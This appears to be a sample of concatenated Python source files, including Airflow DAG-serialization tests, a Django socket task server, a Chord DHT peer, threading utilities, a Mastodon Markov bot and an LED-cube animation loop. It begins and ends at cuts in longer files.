serialized_dag = SerializedDAG.to_dict(dag)
if not task_start_date or dag_start_date >= task_start_date:
# If dag.start_date > task.start_date -> task.start_date=dag.start_date
# because of the logic in dag.add_task()
self.assertNotIn("start_date", serialized_dag["dag"]["tasks"][0])
else:
self.assertIn("start_date", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(simple_task.start_date, expected_task_start_date)
@parameterized.expand([
(datetime(2019, 8, 1), None, datetime(2019, 8, 1)),
(datetime(2019, 8, 1), datetime(2019, 8, 2), datetime(2019, 8, 1)),
(datetime(2019, 8, 1), datetime(2019, 7, 30), datetime(2019, 7, 30)),
])
def test_deserialization_end_date(self,
dag_end_date,
task_end_date,
expected_task_end_date):
dag = DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1),
end_date=dag_end_date)
BaseOperator(task_id='simple_task', dag=dag, end_date=task_end_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_end_date or dag_end_date <= task_end_date:
# If dag.end_date < task.end_date -> task.end_date=dag.end_date
# because of the logic in dag.add_task()
self.assertNotIn("end_date", serialized_dag["dag"]["tasks"][0])
else:
self.assertIn("end_date", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(simple_task.end_date, expected_task_end_date)
@parameterized.expand([
(None, None, None),
("@weekly", "@weekly", "0 0 * * 0"),
("@once", "@once", None),
({"__type": "timedelta", "__var": 86400.0}, timedelta(days=1), timedelta(days=1)),
])
def test_deserialization_schedule_interval(
self, serialized_schedule_interval, expected_schedule_interval, expected_n_schedule_interval
):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"schedule_interval": serialized_schedule_interval,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
self.assertEqual(dag.schedule_interval, expected_schedule_interval)
self.assertEqual(dag.normalized_schedule_interval, expected_n_schedule_interval)
@parameterized.expand([
(relativedelta(days=-1), {"__type": "relativedelta", "__var": {"days": -1}}),
(relativedelta(month=1, days=-1), {"__type": "relativedelta", "__var": {"month": 1, "days": -1}}),
# Every friday
(relativedelta(weekday=FR), {"__type": "relativedelta", "__var": {"weekday": [4]}}),
# Every second friday
(relativedelta(weekday=FR(2)), {"__type": "relativedelta", "__var": {"weekday": [4, 2]}})
])
def test_roundtrip_relativedelta(self, val, expected):
serialized = SerializedDAG._serialize(val)
self.assertDictEqual(serialized, expected)
round_tripped = SerializedDAG._deserialize(serialized)
self.assertEqual(val, round_tripped)
@parameterized.expand([
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
])
def test_dag_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag', params=val)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
self.assertIn("params", serialized_dag["dag"])
else:
self.assertNotIn("params", serialized_dag["dag"])
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
self.assertEqual(expected_val, deserialized_dag.params)
self.assertEqual(expected_val, deserialized_simple_task.params)
@parameterized.expand([
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
])
def test_task_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag')
BaseOperator(task_id='simple_task', dag=dag, params=val,
start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
self.assertIn("params", serialized_dag["dag"]["tasks"][0])
else:
self.assertNotIn("params", serialized_dag["dag"]["tasks"][0])
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
self.assertEqual(expected_val, deserialized_simple_task.params)
def test_extra_serialized_field_and_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command="true")
serialized_dag = SerializedDAG.to_dict(dag)
self.assertIn("bash_command", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(getattr(simple_task, "bash_command"), "true")
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
self.assertEqual(
serialized_dag["dag"]["tasks"][0]["_operator_extra_links"],
[{'tests.test_utils.mock_operators.CustomOpLink': {}}]
)
# Test all the extra_links are set
self.assertCountEqual(simple_task.extra_links, ['Google Custom', 'airflow', 'github', 'google'])
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', "dummy_value_1")
# Test Deserialized inbuilt link
custom_inbuilt_link = simple_task.get_extra_links(test_date, CustomOpLink.name)
self.assertEqual('http://google.com/custom_base_link?search=dummy_value_1', custom_inbuilt_link)
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
self.assertEqual("https://www.google.com", google_link_from_plugin)
def test_extra_serialized_field_and_multiple_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command=["echo", "true"])
serialized_dag = SerializedDAG.to_dict(dag)
self.assertIn("bash_command", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(getattr(simple_task, "bash_command"), ["echo", "true"])
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
self.assertEqual(
serialized_dag["dag"]["tasks"][0]["_operator_extra_links"],
[
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 0}},
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 1}},
]
)
# Test all the extra_links are set
self.assertCountEqual(simple_task.extra_links, [
'BigQuery Console #1', 'BigQuery Console #2', 'airflow', 'github', 'google'])
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', ["dummy_value_1", "dummy_value_2"])
# Test Deserialized inbuilt link #1
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #1")
self.assertEqual('https://console.cloud.google.com/bigquery?j=dummy_value_1', custom_inbuilt_link)
# Test Deserialized inbuilt link #2
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #2")
self.assertEqual('https://console.cloud.google.com/bigquery?j=dummy_value_2', custom_inbuilt_link)
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
self.assertEqual("https://www.google.com", google_link_from_plugin)
class ClassWithCustomAttributes:
"""
Class for testing purpose: allows to create objects with custom attributes in one single statement.
"""
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return "{}({})".format(self.__class__.__name__, str(self.__dict__))
def __repr__(self):
return self.__str__()
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
@parameterized.expand([
(None, None),
([], []),
({}, {}),
("{{ task.task_id }}", "{{ task.task_id }}"),
(["{{ task.task_id }}", "{{ task.task_id }}"]),
({"foo": "{{ task.task_id }}"}, {"foo": "{{ task.task_id }}"}),
({"foo": {"bar": "{{ task.task_id }}"}}, {"foo": {"bar": "{{ task.task_id }}"}}),
(
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
),
(
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}}),
(
ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]),
"ClassWithCustomAttributes("
"{'att1': '{{ task.task_id }}', 'att2': '{{ task.task_id }}', 'template_fields': ['att1']})",
),
(
ClassWithCustomAttributes(nested1=ClassWithCustomAttributes(att1="{{ task.task_id }}",
att2="{{ task.task_id }}",
template_fields=["att1"]),
nested2=ClassWithCustomAttributes(att3="{{ task.task_id }}",
att4="{{ task.task_id }}",
template_fields=["att3"]),
template_fields=["nested1"]),
"ClassWithCustomAttributes("
"{'nested1': ClassWithCustomAttributes({'att1': '{{ task.task_id }}', "
"'att2': '{{ task.task_id }}', 'template_fields': ['att1']}), "
"'nested2': ClassWithCustomAttributes({'att3': '{{ task.task_id }}', "
"'att4': '{{ task.task_id }}', 'template_fields': ['att3']}), 'template_fields': ['nested1']})",
),
])
def test_templated_fields_exist_in_serialized_dag(self, templated_field, expected_field):
"""
Test that templated_fields exists for all Operators in Serialized DAG
Since we don't want to inflate arbitrary python objects (it poses a RCE/security risk etc.)
we want check that non-"basic" objects are turned in to strings after deserializing.
"""
dag = DAG("test_serialized_template_fields", start_date=datetime(2019, 8, 1))
with dag:
BashOperator(task_id="test", bash_command=templated_field)
serialized_dag = SerializedDAG.to_dict(dag)
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_test_task = deserialized_dag.task_dict["test"]
self.assertEqual(expected_field, getattr(deserialized_test_task, "bash_command"))
def test_dag_serialized_fields_with_schema(self):
"""
Additional Properties are disabled on DAGs. This test verifies that all the
keys in DAG.get_serialized_fields are listed in Schema definition.
"""
dag_schema: dict = load_dag_schema_dict()["definitions"]["dag"]["properties"]
# The parameters we add manually in Serialization needs to be ignored
ignored_keys: set = {"is_subdag", "tasks"}
dag_params: set = set(dag_schema.keys()) - ignored_keys
self.assertEqual(set(DAG.get_serialized_fields()), dag_params)
def test_no_new_fields_added_to_base_operator(self):
"""
This test verifies that there are no new fields added to BaseOperator. And reminds that
tests should be added for it.
"""
base_operator = BaseOperator(task_id="10")
fields = base_operator.__dict__
self.assertEqual({'_dag': None,
'_downstream_task_ids': set(),
'_inlets': [],
'_log': base_operator.log,
'_outlets': [],
'_upstream_task_ids': set(),
'depends_on_past': False,
'do_xcom_push': True,
'email': None,
'email_on_failure': True,
'email_on_retry': True,
'end_date': None,
'execution_timeout': None,
'executor_config': {},
'inlets': [],
'max_retry_delay': None,
'on_execute_callback': None,
'on_failure_callback': None,
'on_retry_callback': None,
'on_success_callback': None,
'outlets': [],
'owner': 'airflow',
'params': {},
'pool': 'default_pool',
'pool_slots': 1,
'priority_weight': 1,
'queue': 'default',
'resources': None,
'retries': 0,
'retry_delay': timedelta(0, 300),
'retry_exponential_backoff': False,
'run_as_user': None,
'sla': None,
'start_date': None,
'subdag': None,
'task_concurrency': None,
'task_id': '10',
'trigger_rule': 'all_success',
'wait_for_downstream': False,
'weight_rule': 'downstream'}, fields,
"""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ACTION NEEDED! PLEASE READ THIS CAREFULLY AND CORRECT TESTS CAREFULLY
Some fields were added to the BaseOperator! Please add them to the list above and make sure that
you add support for DAG serialization - you should add the field to
`airflow/serialization/schema.json` - they should have correct type defined there.
Note that we do not support versioning yet so you should only add optional fields to BaseOperator.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
"""
)
|
server.py
|
from datetime import datetime
from sys import platform
import json
import logging
import socketserver
import multiprocessing
import queue
import threading
from .helpers import load_task
from . import helpers
from django.utils import timezone
import django
log = logging.getLogger(__name__)
def target(queue):
django.setup()
log.info('Worker Starts')
while True:
task_id = queue.get()
if task_id is None:
return
log.info('running task...')
# workaround to solve problems with django + psycopg2
# solution found here: https://stackoverflow.com/a/36580629/10385696
django.db.connection.close()
task = load_task(task_id=task_id)
pickled_task = helpers.unpack(task.pickled_task)
try:
task.started_at = timezone.now()
task.save()
return_value = pickled_task()
task.finished_at = timezone.now()
task.pickled_return = helpers.serialize(return_value)
task.save()
log.info('...successfully')
except Exception as e:
log.exception("...task failed")
task.finished_at = timezone.now()
task.pickled_exception = helpers.serialize(e)
task.save()
class Pool(object):
def __init__(self):
if platform == 'darwin':
# OSX does not support forking
self.queue = queue.Queue()
self.worker = threading.Thread(target=target, args=(self.queue,))
else:
self.queue = multiprocessing.Queue()
self.worker = multiprocessing.Process(target=target, args=(self.queue,))
def stop(self):
self.queue.put(None)
class TaskSocketServer(socketserver.BaseRequestHandler):
DEFAULT_POOL = 'default'
# pools holds a mapping from pool names to process objects
pools = {}
def handle(self):
try:
data = self.request.recv(5000).strip()
# assume a serialized task
log.info('Got a task')
response = None
try:
task_id = int(data.decode())
# Connection are closed by tasks, force it to reconnect
django.db.connections.close_all()
task = load_task(task_id=task_id)
# Ensure pool got a worker processing it
pool_name = task.pool or self.DEFAULT_POOL
pool = self.pools.get(pool_name)
if pool is None or not pool.worker.is_alive():
# Spawn new pool
log.info('Spawning new pool: {}'.format(pool_name))
self.pools[pool_name] = Pool()
self.pools[pool_name].worker.start()
self.pools[pool_name].queue.put(task_id)
response = {'task': 'queued', 'task_id': task_id}
except Exception as e:
log.exception("failed to queue task")
response = (False, "TaskServer Put: {}".format(e).encode(),)
response = {
'task': 'failed to queue',
'task_id': task_id,
'error': str(e)
}
self.request.send(json.dumps(response).encode())
except OSError as e:
# in case of network error, just log
log.exception("network error")
@staticmethod
def stop():
for name, pool in TaskSocketServer.pools.items():
print('Stopping pool:', name)
pool.stop()
|
__init__.py
|
#!/usr/bin/python3.8
# Copyright 2021 Aragubas
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
import traceback, importlib, sys, threading
from System import Core
from Library import CorePaths
from Library import CoreUtils as UTILS
from Library import CorePrimitives as Shape
# -- Global Variables -- #
ProcessAccess = list()
ProcessAccess_PID = list()
ProcessNextPID = -1
# -- Create Process Variables -- #
LastProcessWasErrorProcess = False
LastProcess = None
def CreateProcess(Path, ProcessName, pInitArgs=None):
"""
Set the Application Object
:param ApplicationFolder:Folder Path
:return:
"""
global ProcessNextPID
global LastProcessWasErrorProcess
global LastProcess
print("CoreAccess.CreateProcess : Creating Process: [" + ProcessName + "]...")
try:
# Get Process Path
Path = Path.replace("/", CorePaths.TaiyouPath_CorrectSlash)
ProcessIndex = len(ProcessAccess_PID)
ProcessNextPID += 1
# Import Module
Module = importlib.import_module(Core.Get_MainModuleName(Path))
try:
# Get Process Object from Module
ProcessWax = Module.Process(ProcessNextPID, ProcessName, Core.Get_MainModuleName(Path), pInitArgs, ProcessIndex)
except:
# Unload Module
del Module
# Check if module is imported and remove it
if Core.Get_MainModuleName(Path) in sys.modules:
sys.modules.pop(Core.Get_MainModuleName(Path))
UTILS.GarbageCollector_Collect()
# Unload Module
del Module
# Check if module is imported and remove it
if Core.Get_MainModuleName(Path) in sys.modules:
sys.modules.pop(Core.Get_MainModuleName(Path))
UTILS.GarbageCollector_Collect()
# Start process thread with UpdateRequest Function
Thread = threading.Thread(target=ProcessWax.UpdateRequest).start()
# Set THIS_THREAD Variable to Process
ProcessWax.THIS_THREAD = Thread
print("CoreAccess.CreateProcess : Process created sucefully")
# Return newly created process PID
LastProcessWasErrorProcess = False
LastProcess = None
return ProcessNextPID
except:
print("CoreAccess.CreateProcess : Error while creating process.")
print(traceback.format_exc())
if not LastProcessWasErrorProcess:
LastProcessWasErrorProcess = True
try:
LastProcess.KillProcess(False)
LastProcess = None
except:
print("Core.Main.CreateProcess : Error while trying to kill process")
CreateProcess("System{0}SystemApps{0}crash_dialog".format(CorePaths.TaiyouPath_CorrectSlash), "application_crash", (ProcessName, None, None, 1))
def GetProcesByPID(PID):
try:
return ProcessAccess[ProcessAccess_PID.index(PID)]
except IndexError:
raise Exception("Cannot find process with PID [{0}]".format(PID))
def SendSigKillToProcessByPID(PID):
try:
GetProcesByPID(PID).KillProcess(True)
except ValueError:
print("Process with PID {0} cannot be killed because it was already finished\nor it has been not registred to CoreAccess.".format(PID))
def KillProcessByPID(PID):
global ProcessListChanged
Index = GetProcessIndexByPID(PID)
# Call SIG_KILL Function on Process
ProcessAccess[ProcessAccess_PID.index(PID)].KillProcess(False)
UTILS.GarbageCollector_Collect()
print("Taiyou : Finished process index: " + str(Index))
#ProcessListChanged = True
ClearPreRendered()
def ClearPreRendered():
Shape.ClearPreRendered_Rectangles()
def GetProcessIndexByPID(PID):
try:
return ProcessAccess_PID.index(PID)
except ValueError:
raise ModuleNotFoundError("The process {0} could not be found".format(PID))
def RegisterToCoreAccess(self):
ProcessAccess.append(self)
ProcessAccess_PID.append(self.PID)
def RemoveFromCoreAccess(process):
try:
Index = ProcessAccess_PID.index(process.PID)
ProcessAccess.pop(Index)
ProcessAccess_PID.pop(Index)
except ValueError:
print("Cannot remove process that doesn't exist.")
|
data_fetcher.py
|
import vrpn
import threading
import time
from functools import partial
import config
class DataFetcher(threading.Thread):
daemon = True
def __init__(self, mongo, opti_track_mode=True):
super(DataFetcher, self).__init__()
self.opti_track_mode = opti_track_mode
self.mongo = mongo
self.trackables = list()
self.trackers = []
self.data_runner = None
self.stop = True
self.record_for_study = False
self.study_data = []
self.fat_var = []
#self.mongo_tracking.remove({})
def add_trackable(self, trackable):
self.trackables.append(trackable)
def middle_callback(self, trackable, index, userdata, data):
if self.record_for_study:
self.fat_var.append({"trials." + self.study_data[1] + ".optitrack_data": {"userdata": userdata, "data": data, "index": index, "trackable_name": trackable.machine_name}})
if not self.stop:
trackable.on_data_callback(userdata, data, index)
def get_data_for_study(self, current_study_participant, q_index):
self.record_for_study = True
self.study_data = [current_study_participant, q_index]
self.fat_var = []
def done_with_study_data(self):
self.record_for_study = False
self.study_data = []
return self.fat_var
def unregister_trackers(self):
for tracker in self.trackers:
tracker[0].unregister_change_handler("position", tracker[1], "position")
self.trackers = []
if not self.data_runner is None:
self.data_runner.join()
self.data_runner = None
print("All trackers stopped!")
def register_trackers(self):
if self.opti_track_mode:
for trackable in self.trackables:
for i, tracker in enumerate(trackable.trackables):
print(tracker, i)
tracker_var = vrpn.receiver.Tracker(tracker + "@" + config.OPTITRACK_IP)
handler = partial(self.middle_callback, trackable, i)
tracker_var.register_change_handler("position", handler, "position")
self.trackers.append([tracker_var, handler])
self.data_runner = threading.Thread(target=self.data_fetcher_loop)
self.data_runner.start()
print("All trackers started!")
def data_fetcher_loop(self):
while len(self.trackers) > 0:
if not self.stop:
for tracker in self.trackers:
tracker[0].mainloop()
time.sleep(0.005)
else:
time.sleep(0.1)
# def run(self):
# if self.opti_track_mode:
# while True:
#
# else:
# pickle_data = pickle.load( open( "massive_file.pkl", "rb" ) )
# for x in range(10):
# for data in pickle_data:
# self.hand.on_data_callback('', data)
# time.sleep(0.001)
|
peer.py
|
#!/usr/bin/env python3
"""
Chord peer
==========
This module provides peer of a Chord distributed hash table.
"""
import random
import time
import socket
import socketserver
import threading
import logging
logging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s',
level=logging.DEBUG)
CHAIN = 3
CHORDS = 30
MAX_KEY = 2**CHORDS
CHORD_UPDATE_INTERVAL = 5
class Peer:
def __init__(self, port=4321, key=None):
if key is None:
self.key = random.randint(0, MAX_KEY)
else:
self.key = key
logging.info('Peer key: %x' % self.key)
self.chords = [None] * CHORDS
self.chain = [None]
self.storage = {}
self.port = port
def connect(self, url):
"""
Connects to the DHT using the given `url` (of any connected node).
"""
logging.info('Connecting to: ' + url)
old = self.find_re(self.key, connecting=url)
logging.debug(old)
self.chain = [old] + request(url, 'accept', self.key,
bytes(str(self.port), 'ascii'))
for i in range(CHORDS):
key = (self.key + 2**i) % MAX_KEY
if not inside(key, self.key, old[0]):
self.chords[i] = self.find_re(key, connecting=url)
def accept(self, key, url):
"""
Accepts a peer to the DHT by:
- putting him on the ring after itself
- reassigning to him part of own key space
"""
self.chain = [(key, url)] + self.chain
# TODO: transfer him the stored keys
for i in range(CHORDS):
key = (self.key + 2**i) % MAX_KEY
if self.chords[i] is None and\
not inside(key, self.key, self.chain[0][0]):
self.chords[i] = self.chain[0]
def start(self):
"""
Starts Peer's operation.
"""
Handler.peer = self
logging.info('Listening on port %d' % self.port)
server = Server(('0.0.0.0', self.port), Handler)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
logging.debug('Server thread started')
while True:
time.sleep(CHORD_UPDATE_INTERVAL)
self._update_chords()
def find(self, key):
"""
Find a peer that is closer to the one responsible for the given `key`.
Returns `None` if it's the responsible itself, or a tuple `(key, url)`.
"""
if self.chain[0] is None or inside(key, self.key, self.chain[0][0]):
return None
for i in range(CHORDS - 1):
if self.chords[i] is None:
continue # I'm still responsible for this part
if inside(key, self.chords[i][0], self.chords[i+1][0]):
return self.chords[i]
if self.chords[-1] is None:
return self.chain[0] # Another funny corner case
else:
return self.chords[-1]
def find_re(self, key, connecting=None):
"""
Find the peer that is responsible for the given `key`.
Returns `None` if it's the responsible itself, or a tuple `(key, url)`.
"""
if connecting is not None:
closer = (None, connecting)
else:
closer = self.find(key)
if closer is None:
return None
while not isinstance(closer, Me):
closer = request(closer[1], 'find', key)
return closer
def get(self, key):
"""
Return the value for the `key`, wherever it is stored.
"""
responsible = self.find_re(key)
logging.debug('Peer %s responsible for key %x' %
(responsible, key))
if responsible is None:
return self.storage.get(key, None)
else:
return request(responsible[1], 'get', key)
def put(self, key, value):
"""
Store the `(key, value)` in the DHT.
"""
responsible = self.find_re(key)
logging.debug('Peer %s responsible for key %x' %
(responsible, key))
if responsible is None:
self.storage[key] = value
else:
request(responsible[1], 'put', key, value)
def _update_chords(self):
logging.info('Storing %d values' % len(self.storage))
logging.debug(self.chain)
if self.chain[0] is None:
return
logging.debug('Updating chords')
for i in range(CHORDS):
key = (self.key + 2**i) % MAX_KEY
if not inside(key, self.key, self.chain[0][0]):
self.chords[i] = self.find_re(key)
logging.debug("%d chords established" %
sum([1 for x in self.chords if x is not None]))
def inside(key, left, right):
"""
Find whether the key is in the interval `[left, right)`.
Note the keys are arranged on a ring, so it is possible that left > right.
"""
if left == right:
return False
if left < right:
return left <= key < right
else:
return left <= key or key < right
def request(url, operation, key, value=None):
logging.debug('Requesting from %s operation %s key %x value %s' %
(url, operation, key, value))
sock = _connect(url)
body = bytes("%s %x\n" % (operation, key), 'ascii')
if value:
body += bytes("%d\n" % len(value), 'ascii')
body += value
try:
sock.sendall(body)
inh = sock.makefile('rb')
response = inh.readline()
if response.startswith(b'value'):
logging.debug(response)
length = int(response.split()[1])
return inh.read(length)
elif response.startswith(b'none'):
raise KeyError("Key %x not in DHT" % key)
elif response.startswith(b'peer'):
logging.debug('Raw response %s' % response)
return _parse_peer(response)
elif response.startswith(b'me'):
key = int(response.split()[1], base=16)
return Me([key, url])
elif response.startswith(b'chain'):
chain = []
for line in inh:
chain.append(_parse_peer(line))
return chain
finally:
sock.close()
return response
class Handler(socketserver.StreamRequestHandler):
peer = None
def handle(self):
inh = self.rfile
operation, key = inh.readline().split()
key = int(key, base=16)
logging.info("Request: %s %x" % (operation, key))
response = b'unknown operation'
if operation == b'find':
peer = self.peer.find(key)
if peer is None:
response = bytes("me %x\n" % self.peer.key, 'ascii')
else:
response = _serialize_peer(peer)
elif operation == b'accept':
response = b"chain\n"
for peer in self.peer.chain:
response += _serialize_peer(peer)
port = int(_read_value(inh))
self.peer.accept(key, _make_url(self.request, port))
elif operation == b'get':
value = self.peer.get(key)
if value is None:
response = b'none'
else:
response = bytes("value %d\n" % len(value), 'ascii')
response += value
elif operation == b'put':
value = _read_value(inh)
logging.debug("Value: %s" % value)
self.peer.put(key, value)
response = b'ok'
elif operation == b'ping':
response = b'pong'
logging.debug("Response: %s\n" % response)
self.request.sendall(response)
def _read_value(inh):
length = int(inh.readline())
return inh.read(length)
class Server(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
class Address(tuple): # Hate I can't define my own __init__
pass
class Me(Address):
pass
def _parse_peer(line):
if line.startswith(b'peer'):
key, url = line.split()[1:]
return Address([int(key, base=16), url])
elif line.startswith(b'none'):
return None
else:
raise ValueError('Wrong response for peer %s' % line)
def _serialize_peer(peer):
if peer is None:
return b'none'
else:
return bytes("peer %x %s\n" % (peer[0], str(peer[1], 'ascii')),
'ascii')
def _make_url(socket, port=None):
#FIXME: this gives us the request socket, not the listening one
if port is None:
return bytes("%s:%d" % socket.getpeername(), 'ascii')
else:
return bytes("%s:%d" % (socket.getpeername()[0], port), 'ascii')
def _connect(url):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if isinstance(url, bytes):
url = str(url, 'ascii')
if ':' in str(url):
host, port = url.split(':')
port = int(port)
else:
host, port = url, 4321
sock.connect((host, port))
return sock
def main():
import argparse
argp = argparse.ArgumentParser(description=__doc__)
argp.add_argument('-key', help='hexadecimal key for this node')
argp.add_argument('-url', help='url of an existing DHT peer')
argp.add_argument('-port', help='listening TCP port',
type=int, default=4321)
args = argp.parse_args()
if args.key is not None:
args.key = int(args.key, 16)
peer = Peer(port=args.port, key=args.key)
if args.url:
peer.connect(args.url)
peer.start()
if __name__ == '__main__':
main()
|
thread_.py
|
import threading
from threading import Thread
def get_current_thread():
return threading.current_thread()
def get_current_thread_name():
return get_current_thread().getName()
def is_alive(t):
return t.is_alive()
def create_and_start(name, target, daemon = True):
t = Thread(target= target)
t.daemon = True
t.setName(name)
t.start()
return t
class ThreadPool(object):
def __init__(self, capacity = 10):
import threadpool
self.num_threads = capacity
self.pool = threadpool.ThreadPool(10)
def add(self, fn, args):
import threadpool
if type(args) == list:
args = [(args, None)]
elif type(args) == dict:
args = [(None, args)]
else:
raise ValueError("Unsuported args,", type(args))
request = threadpool.makeRequests(fn, args)[0]
self.pool.putRequest(request, block = False)
self.pool.poll()
def join(self):
self.pool.wait()
class ProcessPool(object):
"""
Remember that function in function is not supported by multiprocessing.
"""
def __init__(self, capacity = 8):
from multiprocessing import Pool
self.capacity = capacity
self.pool = Pool(capacity)
def add(self, fn, args):
self.pool.apply_async(fn, args)
# self.pool.poll()
# self.pool.poll
def join(self):
self.pool.close()
self.pool.join()
|
app.py
|
#!/usr/bin/env python3
import configparser
import time
import threading
import mastodonTool
import os
import datetime
import markovify
import exportModel
import re
# 環境変数の読み込み
config_ini = configparser.ConfigParser()
config_ini.read('config.ini', encoding='utf-8')
def worker():
# 学習
domain = config_ini['read']['domain']
read_access_token = config_ini['read']['access_token']
write_domain = config_ini['write']['domain']
write_access_token = config_ini['write']['access_token']
account_info = mastodonTool.get_account_info(domain, read_access_token)
params = {"exclude_replies": 1, "exclude_reblogs": 1}
filename = "{}@{}".format(account_info["username"], domain)
filepath = os.path.join("./chainfiles", os.path.basename(filename.lower()) + ".json")
if (os.path.isfile(filepath) and datetime.datetime.now().timestamp() - os.path.getmtime(filepath) < 60 * 60 * 24):
print("モデルは再生成されません")
else:
exportModel.generateAndExport(mastodonTool.loadMastodonAPI(domain, read_access_token, account_info['id'], params), filepath)
print("LOG,GENMODEL," + str(datetime.datetime.now()) + "," + account_info["username"].lower()) # Log
# 生成
with open("./chainfiles/{}@{}.json".format(account_info["username"].lower(), domain)) as f:
textModel = markovify.Text.from_json(f.read())
sentence = textModel.make_sentence(tries=300)
sentence = "".join(sentence.split()) + ' #bot'
sentence = re.sub(r'(:.*?:)', r' \1 ', sentence)
print(sentence)
try:
mastodonTool.post_toot(write_domain, write_access_token, {"status": sentence})
except Exception as e:
print("投稿エラー: {}".format(e))
def schedule(f, interval=1200, wait=True):
base_time = time.time()
next_time = 0
while True:
t = threading.Thread(target=f)
t.start()
if wait:
t.join()
next_time = ((base_time - time.time()) % interval) or interval
time.sleep(next_time)
if __name__ == "__main__":
# 定期実行部分
schedule(worker)
# worker()
|
main.py
|
from ledcd import CubeDrawer
from falling_helper import *
import colorsys
from random import random
import threading
drawer = CubeDrawer.get_obj()
plane = FallingWall(0, 1.5, colorsys.hsv_to_rgb(random(), 1, 1), drawer)
# drawer.translate(7.5, 7.5, 7.5)
# drawer.scale(0.5, 0.5, 0.5)
def plane_updater():
global plane
counter = 0
while True:
time.sleep(2.8)
counter += 1
plane = FallingWall(counter % 4, 1, colorsys.hsv_to_rgb(random(), 1, 1), drawer)
threading.Thread(target=plane_updater, daemon=True).start()
while True:
drawer.clear()
plane.update()
plane.draw()
drawer.show()
|
portable_runner.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
